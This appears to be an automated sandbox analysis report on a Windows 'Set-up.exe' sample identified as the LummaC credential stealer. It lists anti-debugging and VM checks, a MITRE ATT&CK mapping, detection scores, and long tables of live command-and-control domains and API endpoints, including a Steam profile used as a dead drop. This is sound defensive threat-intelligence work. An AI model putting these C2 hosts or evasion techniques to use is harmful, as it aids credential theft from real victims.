Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D0575 mov edx, dword ptr fs:[00000030h]	0_2_029D0575
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D0B35 mov eax, dword ptr fs:[00000030h]	0_2_029D0B35
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D1185 mov eax, dword ptr fs:[00000030h]	0_2_029D1185
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_029D1184 mov eax, dword ptr fs:[00000030h]	0_2_029D1184

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00BFE4EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00BFE4EE

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Set-up.exe	String found in binary or memory: enlargkiw.sbs
Source: Set-up.exe	String found in binary or memory: resinedyw.sbs
Source: Set-up.exe	String found in binary or memory: mathcucom.sbs
Source: Set-up.exe	String found in binary or memory: allocatinow.sbs
Source: Set-up.exe	String found in binary or memory: condifendteu.sbs
Source: Set-up.exe	String found in binary or memory: drawwyobstacw.sbs
Source: Set-up.exe	String found in binary or memory: vennurviot.sbs
Source: Set-up.exe	String found in binary or memory: ehticsprocw.sbs
Source: Set-up.exe	String found in binary or memory: sippymroat.cfd

Source: Set-up.exe

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00BFDF75 cpuid

0_2_00BFDF75

Source: C:\Users\user\Desktop\Set-up.exe

Code function: GetKeyboardLayout,GetLocaleInfoA,atol,

0_2_00A6D240

Source: C:\Users\user\Desktop\Set-up.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00BFEFA3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00BFEFA3

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	2 Virtualization/Sandbox Evasion	11 Input Capture	1 System Time Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	43 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	34%	ReversingLabs	Win32.Spyware.Lummastealer
Set-up.exe	41%	Virustotal		Browse

Source	Detection	Scanner	Link
condifendteu.sbs	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
sippymroat.cfd	0%	Virustotal	Browse
vennurviot.sbs	17%	Virustotal	Browse
drawwyobstacw.sbs	0%	Virustotal	Browse
mathcucom.sbs	20%	Virustotal	Browse
sergei-esenin.com	18%	Virustotal	Browse
ehticsprocw.sbs	0%	Virustotal	Browse
resinedyw.sbs	0%	Virustotal	Browse
allocatinow.sbs	0%	Virustotal	Browse
enlargkiw.sbs	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://player.vimeo.com	0%	URL Reputation	safe
https://player.vimeo.com	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://sergei-esenin.com/	0%	Virustotal		Browse
https://vennurviot.sbs/	18%	Virustotal		Browse
drawwyobstacw.sbs	0%	Virustotal		Browse
sippymroat.cfd	0%	Virustotal		Browse
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
enlargkiw.sbs	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	0%	Virustotal		Browse
allocatinow.sbs	0%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://sippymroat.cfd/api	1%	Virustotal		Browse
https://www.youtube.com	0%	Virustotal		Browse
mathcucom.sbs	20%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	0%	Virustotal		Browse
http://www.spaceblue.com	0%	Virustotal		Browse
https://sketchfab.com	0%	Virustotal		Browse
http://www.activestate.com	0%	Virustotal		Browse
https://ehticsprocw.sbs/pi	11%	Virustotal		Browse
https://vennurviot.sbs/api	18%	Virustotal		Browse
https://enlargkiw.sbs/	18%	Virustotal		Browse
https://www.youtube.com/	0%	Virustotal		Browse
ehticsprocw.sbs	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	0%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://sergei-esenin.com/r	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
condifendteu.sbs	172.67.141.136	true	true	0%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
sippymroat.cfd	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
vennurviot.sbs	172.67.140.193	true	true	17%, Virustotal, Browse	unknown
drawwyobstacw.sbs	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
mathcucom.sbs	188.114.96.3	true	true	20%, Virustotal, Browse	unknown
sergei-esenin.com	104.21.53.8	true	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	104.21.30.221	true	true	0%, Virustotal, Browse	unknown
resinedyw.sbs	104.21.77.78	true	true	0%, Virustotal, Browse	unknown
enlargkiw.sbs	172.67.152.13	true	true	0%, Virustotal, Browse	unknown
allocatinow.sbs	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true	0%, Virustotal, Browse	unknown
allocatinow.sbs	true	0%, Virustotal, Browse	unknown
sippymroat.cfd	true	0%, Virustotal, Browse	unknown
drawwyobstacw.sbs	true	0%, Virustotal, Browse	unknown
https://sippymroat.cfd/api	true	1%, Virustotal, Browse	unknown
mathcucom.sbs	true	20%, Virustotal, Browse	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	true	0%, Virustotal, Browse	unknown
condifendteu.sbs	true		unknown
https://drawwyobstacw.sbs/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://player.vimeo.com	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://steamcommunity.com/?subsection=broadcasts	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.activestate.comHolger	Set-up.exe	false		unknown
https://sergei-esenin.com/	Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://vennurviot.sbs/	Set-up.exe, 00000000.00000003.1891644416.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse	unknown
https://store.steampowered.com/subscriber_agreement/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.spaceblue.com	Set-up.exe	false	0%, Virustotal, Browse	unknown
https://steamcommunity.com/a1	Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://s.ytimg.com;	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.develop.comDeepak	Set-up.exe	false		unknown
https://steam.tv/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ehticsprocw.sbs/pi	Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.activestate.com	Set-up.exe	false	0%, Virustotal, Browse	unknown
http://store.steampowered.com/privacy_agreement/	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/	Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse	unknown
https://sketchfab.com	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://vennurviot.sbs/api/4	Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://lv.queniujq.cn	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	Set-up.exe	false		unknown
https://www.cloudflare.com/5xx-error-landing	Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/r	Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/api	Set-up.exe, 00000000.00000002.2124248780.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://mathcucom.sbs/	Set-up.exe, 00000000.00000003.1849993860.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.lua.org	Set-up.exe	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ehticsprocw.sbs/j	Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ehticsprocw.sbs/	Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.scintilla.org/scite.rng	Set-up.exe	false		unknown
https://help.steampowered.com/en/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/market/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/apisC	Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/2	Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/api	Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900Q1	Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.baanboard.comBrendon	Set-up.exe	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	Set-up.exe	false		unknown
http://www.scintilla.org	Set-up.exe	false		unknown
https://ehticsprocw.sbs/B	Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
